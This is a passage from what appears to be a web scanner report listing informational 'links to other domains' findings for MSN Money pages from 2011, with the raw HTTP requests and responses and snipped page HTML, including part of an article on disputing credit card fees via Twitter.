Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:10:48 GMT
Content-Length: 51593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353448&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Fnews.aspx%3Fsymbol%3D%257B0%257D%26q%3D%257B0%257D&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.182. http://money.redacted/business-news/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business-news/news.aspx?briefing=inplay HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:56:41 GMT
Content-Length: 51572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410202&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Fnews.aspx%3Fbriefing%3Dinplay&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.183. http://money.redacted/business-news/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /business-news/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business-news/news.aspx?symbol={0}&q={0} HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:56:43 GMT
Content-Length: 51593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410204&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Fnews.aspx%3Fsymbol%3D%257B0%257D%26q%3D%257B0%257D&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.184. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=8dcfafeb0d9747cb8848c127cabb0f72; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:59 GMT
Content-Length: 81683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344880&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<cite>By <a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew">CreditCards.com</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew"><img src="http://colstb.msn.com/i/7E/1944B57464FBD948FCCE16DB38BB4.jpg" width="120" height="30" alt="CreditCards.com on MSN Money" />
...[SNIP]...
<p>Why wait on endless hold to dispute a credit card fee over the phone when you can post your complaint on <a class="opennew" href="http://www.twitter.com/">Twitter</a>
...[SNIP]...
<p>Most major banks in the United States, including <a class="opennew" href="http://www.bing.com/search?q=wells+fargo&amp;form=MSMONY">Wells Fargo</a>, <a class="opennew" href="http://www.bing.com/search?q=bank+of+america&amp;form=MSMONY">Bank of America</a> and <a class="opennew" href="http://www.bing.com/search?q=citi&amp;form=MSMONY">Citi</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&amp;form=MSMONY" class="opennew"><img src="http://moneycentral.redacted/content/data/images/Thumbnail/bingLogo-60.gif" width="60" height="27" alt="Search for personal finance on Twitter on Bing" class="img1" />
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&amp;form=MSMONY" class="opennew">Personal finance on Twitter</a>
...[SNIP]...
messages can be helpful. "Customer service is one of the most logical and valuable uses of Twitter," says Christophe Langlois, who tracks the social media use of financial institutions on the website <a class="opennew" href="http://www.Visible-Banking.com/">Visible-Banking</a>
...[SNIP]...
<p>Like most major financial institutions, MasterCard has channels on Twitter and <a class="opennew" href="http://www.facebook.com/">Facebook</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1" class="opennew">How to dispute a credit card bill with a merchant</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1" class="opennew">How to change financial bad habits in 8 steps </a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1" class="opennew">Credit card foreign transaction fees going up </a>
...[SNIP]...
'True','1');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?page=2&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
','0');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?page=2&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHbIFZX69e-qNzxvkIyimvEbvjpCVpW6S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGoG-LEpQfUy6k-KMKBYowSsHdlMkNkJh?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X7V_Rv-PpYCuEZxovOFi02qEgNUb2tziQ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XRKEouVn3wnqlwUUAegcxQYTdNJy-p03z?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&amp;form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&amp;form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&amp;form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&amp;go=&amp;form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&amp;form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.185. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:55:15 GMT
Content-Length: 114301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410115&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<cite>By <a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew">CreditCards.com</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew"><img src="http://colstb.msn.com/i/7E/1944B57464FBD948FCCE16DB38BB4.jpg" width="120" height="30" alt="CreditCards.com on MSN Money" />
...[SNIP]...
<p>Why wait on endless hold to dispute a credit card fee over the phone when you can post your complaint on <a class="opennew" href="http://www.twitter.com/">Twitter</a>
...[SNIP]...
<p>Most major banks in the United States, including <a class="opennew" href="http://www.bing.com/search?q=wells+fargo&amp;form=MSMONY">Wells Fargo</a>, <a class="opennew" href="http://www.bing.com/search?q=bank+of+america&amp;form=MSMONY">Bank of America</a> and <a class="opennew" href="http://www.bing.com/search?q=citi&amp;form=MSMONY">Citi</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&amp;form=MSMONY" class="opennew"><img src="http://moneycentral.redacted/content/data/images/Thumbnail/bingLogo-60.gif" width="60" height="27" alt="Search for personal finance on Twitter on Bing" class="img1" />
